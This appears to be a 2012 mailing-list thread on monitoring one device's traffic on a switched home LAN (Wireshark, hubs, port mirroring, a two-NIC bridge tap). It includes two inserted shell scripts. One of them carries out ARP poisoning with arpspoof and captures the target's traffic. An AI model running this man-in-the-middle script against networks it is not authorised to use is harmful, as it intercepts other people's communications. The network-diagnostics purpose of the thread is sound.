I want somehow (if it's possible) to monitor the packets going into and out of one ethernet address/MAC address on my LAN. I think it's currently plugged into a port on my 8-port Gigabit switch but I'm not absolutely sure of that.
The LAN comprises a Draytek Vigor ADSL router talking to the outside world and a Linksys 8-port Gigabit router with most of my LAN systems plugged into that. I think a couple of the four ports on the ADSL router may be in use in addition to the one that connects to the 8-Port Gigabit switch.
Is there any 'easy' way to monitor all traffic to/from one specific IP address on the LAN from my desktop computer or will the switches on the LAN prevent it seeing most of the traffic?
Actually even being able to see all traffic between my desktop and the device I'm interested in would probably be sufficient as 'lack of traffic' might well be enough to tell me what I want to know. So what are the best/easiest packet sniffers to run on a desktop machine that would allow me to 'see' all traffic to/from a specific IP address?
Unfortunately on a "dumb" switch (as opposed to a managed switch) it isn't that simple to see all traffic or traffic to/from a specific port other than the one your sniffer is plugged into.
On a managed switch you put the port your sniffer is plugged into into monitor mode (or span mode in Cisco money) which makes that port promiscuous, then you can see *all traffic.
As it is with a dumb switch, if you run wireshark on your desktop you will only see traffic to and from that machine + any broadcast packets.
If you have a machine with 2 ethernet interfaces you can build an ethernet tap either by making it a bridge and sticking it between whatever is in port 8 and the port itself or by doing another trick with some spare rj45 modules see
http://www.enigmacurry.com/category/diy/ for a reasonable guide on how to do this.
Finally you can use tricks such as ARP poisoning or MAC flooding but both of these are really only suitable for espionage rather than diagnostics as you change the behaviour of the network by utilising them.
* Well not quite all traffic
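The two-NIC bridge tap and the filtered capture described above, as an added example for this thread (not code posted by anyone in it). The interface names, bridge name and the device's MAC/IP are assumptions to be overridden in the environment; DRY_RUN=1 (the default) only prints the commands, and DRY_RUN=0 as root executes them.

```shell
#!/bin/sh
# Transparent two-NIC bridge tap plus a filtered capture of one device.
# Added example for this thread, not code from any poster. Interface names,
# the bridge name and the device's MAC/IP are assumptions: override them in
# the environment. DRY_RUN=1 (the default) only prints the commands; set
# DRY_RUN=0 and run as root to execute them.

DRY_RUN="${DRY_RUN:-1}"
BR="${BR:-br0}"
NIC_A="${NIC_A:-eth1}"                        # assumed: cable to the switch port
NIC_B="${NIC_B:-eth2}"                        # assumed: cable to the device under test
TARGET_MAC="${TARGET_MAC:-00:11:22:33:44:55}" # assumed: MAC of the device
TARGET_IP="${TARGET_IP:-192.168.1.50}"        # assumed: IP of the device
PCAP="${PCAP:-tap.pcap}"

# Print or execute a command depending on DRY_RUN.
run() {
    if [ "$DRY_RUN" = 1 ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# BPF capture filter for one device: match on the MAC (unaffected by DHCP
# renumbering) or on the IP (catches frames whose destination MAC is the
# router's because they are leaving the subnet).
capture_filter() {
    printf 'ether host %s or host %s' "$1" "$2"
}

# Bring up a bridge with no IP address of its own so the tap does not
# answer ARP, DHCP or IPv6 on the LAN; frames pass through unchanged.
tap_up() {
    run ip link add name "$BR" type bridge
    run ip link set "$NIC_A" master "$BR"
    run ip link set "$NIC_B" master "$BR"
    run ip link set "$NIC_A" up
    run ip link set "$NIC_B" up
    run ip link set "$BR" up
    run sysctl -w "net.ipv6.conf.$BR.disable_ipv6=1"
}

tap_down() {
    run ip link set "$BR" down
    run ip link set "$NIC_A" nomaster
    run ip link set "$NIC_B" nomaster
    run ip link delete "$BR"
}

# Capture on the port facing the device: that interface sees every frame it
# receives from the device and every frame the bridge sends out to it, so
# both directions of the conversation land in the pcap. Open it in wireshark
# afterwards, or swap "-w $PCAP" for "-v" to watch live.
capture() {
    run tcpdump -i "$NIC_B" -nn -w "$PCAP" "$(capture_filter "$TARGET_MAC" "$TARGET_IP")"
}

# "Lack of traffic" check: count the frames matching the device in a
# finished capture file. Prints 0 when the device never spoke.
frame_count() {
    tcpdump -nn -r "$1" "$(capture_filter "$TARGET_MAC" "$TARGET_IP")" 2>/dev/null | wc -l
}

main() {
    tap_up
    capture          # Ctrl-C stops the capture
    tap_down
}

# Only run the whole procedure when explicitly asked, so the functions can
# be sourced or tested without touching any interface.
if [ "${TAP_RUN:-0}" = 1 ]; then
    main
fi
```

The bridge has no address, so nothing on the LAN can tell it is there; the device's own port on the switch simply sees the tap machine's second NIC in place of the device, and spanning tree is not needed because the bridge adds no loop. Capturing on the device-facing port rather than on br0 keeps the capture independent of how the kernel delivers forwarded frames to the bridge device.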
On Tue, Jul 31, 2012 at 08:05:41AM +0100, Wayne Stallwood wrote:
> Unfortunately on a "dumb" switch (as opposed to a managed switch) it isn't that simple to see all traffic or traffic to/from a specific port other than the one your sniffer is plugged into.
Yes, I suppose I could dig out a *really dumb* hub as opposed to a switch and plug the relevant boxes into that - see below though.
> On a managed switch you put the port your sniffer is plugged into into monitor mode (or span mode in Cisco money) which makes that port promiscuous, then you can see *all traffic.
> As it is with a dumb switch, if you run wireshark on your desktop you will only see traffic to and from that machine + any broadcast packets.
Fortunately running wireshark on my desktop machine showed me what the problem was: the packets I was looking for were (supposed to be) broadcast packets, but the destination address was getting set to pretty much random numbers rather than the correct 255.255.255.255. Since the switch didn't know where to send the packets with random-looking addresses, they arrived at my desktop machine (as well as everywhere else, presumably) and I could see them.
It was an uninitialised variable in a loop causing the problem.
> If you have a machine with 2 ethernet interfaces you can build an ethernet tap either by making it a bridge and sticking it between whatever is in port 8 and the port itself or by doing another trick with some spare rj45 modules see
> http://www.enigmacurry.com/category/diy/ for a reasonable guide on how to do this.
That could be very useful, I have a 'spare' machine which has two ethernet interfaces so could set it up as a tap quite easily.
> Finally you can use tricks such as ARP poisoning or MAC flooding but both of these are really only suitable for espionage rather than diagnostics as you change the behaviour of the network by utilising them.
> * Well not quite all traffic
Thanks for all the ideas.
On Tue, 31 Jul 2012 08:05:41 +0100 Wayne Stallwood ALUGlist@digimatic.co.uk allegedly wrote:
> Finally you can use tricks such as ARP poisoning or MAC flooding but both of these are really only suitable for espionage rather than diagnostics as you change the behaviour of the network by utilising them.
Try dugsong's tools (dsniff et al) at http://www.monkey.org/~dugsong/dsniff/ or probably available in your distro repository.
Mick
---------------------------------------------------------------------
blog: baldric.net
fingerprint: FC23 3338 F664 5E66 876B 72C0 0A1F E60B 5BAD D312
Note that I have recently upgraded my GPG key, see: http://baldric.net/2012/07/20/gpg-key-upgrade/
---------------------------------------------------------------------
Hi Chris,
The simplest way to do this is to connect your PC and the other LAN device into a hub. Then you can use a program like wireshark or tcpdump to view all the traffic from the other LAN device. Another option is to use ARP poisoning; this would at least cause you to see traffic from other devices trying to leave the local subnet (by posing as your router).
If you have a managed switch that supports more advanced features you can use something like SPAN or port mirroring to get a copy of all traffic coming into one port, sent out another.
Cheers, James.
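The ARP poisoning route that Mick (dsniff) and James (posing as the router) describe, as an added example for this thread rather than code from any poster. It uses dsniff's arpspoof, whose -i/-t usage is as documented by that tool; the interface, the target and the router's LAN address are assumptions to set in the environment. As Wayne notes, this changes the network's behaviour, and it only shows traffic that crosses the router, not flows between two other LAN hosts, so it belongs on a network you are authorised to tamper with. DRY_RUN=1 (the default) prints the commands; DRY_RUN=0 as root executes them.

```shell
#!/bin/sh
# ARP poisoning with dsniff's arpspoof, for a switched LAN with no spare NIC.
# Added example for this thread, not code from any poster. Interface and
# addresses are assumptions; set them in the environment. This changes how
# the network behaves and only shows traffic that crosses the router.
# DRY_RUN=1 (the default) prints the commands; DRY_RUN=0 as root executes.

DRY_RUN="${DRY_RUN:-1}"
IFACE="${IFACE:-eth0}"
TARGET="${TARGET:-192.168.1.50}"   # assumed: the device of interest
GATEWAY="${GATEWAY:-192.168.1.1}"  # assumed: the router's LAN address
PCAP="${PCAP:-mitm.pcap}"

# Print or execute a command depending on DRY_RUN.
run() {
    if [ "$DRY_RUN" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi
}

# Same as run but backgrounds the command, since arpspoof keeps sending
# replies until it is stopped.
spawn() {
    if [ "$DRY_RUN" = 1 ]; then printf '%s &\n' "$*"; else "$@" & fi
}

# arpspoof -i IFACE -t VICTIM HOST: send VICTIM unsolicited ARP replies
# claiming HOST is at our MAC. Each direction needs its own instance.
spoof_cmd() {
    printf 'arpspoof -i %s -t %s %s' "$IFACE" "$1" "$2"
}

# Forwarding must be on before poisoning starts; otherwise the target's
# packets arrive at the sniffer and are dropped, which is a denial of
# service rather than a tap.
poison_start() {
    run sysctl -w net.ipv4.ip_forward=1
    spawn $(spoof_cmd "$TARGET" "$GATEWAY")   # tell the target we are the router
    spawn $(spoof_cmd "$GATEWAY" "$TARGET")   # tell the router we are the target
}

# arpspoof re-announces the real MACs when it receives SIGINT, so stop it
# with INT rather than KILL to leave both ARP caches as they were.
poison_stop() {
    run pkill -INT arpspoof
    run sysctl -w net.ipv4.ip_forward=0
}

# Capture only the target's traffic and leave out our own ARP noise.
capture() {
    run tcpdump -i "$IFACE" -nn -w "$PCAP" "host $TARGET and not arp"
}

main() {
    poison_start
    capture          # Ctrl-C stops the capture
    poison_stop
}

# Only run the whole procedure when explicitly asked, so the functions can
# be sourced or tested without sending a single frame.
if [ "${MITM_RUN:-0}" = 1 ]; then
    main
fi
```

The restore step matters for diagnostics: if arpspoof is killed outright the target and router keep the poisoned entries until they time out, and the target loses connectivity for that period.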
Ettercap is something to look at for use in a switched LAN, I've not had cause to use it outside of testing yet.
Adam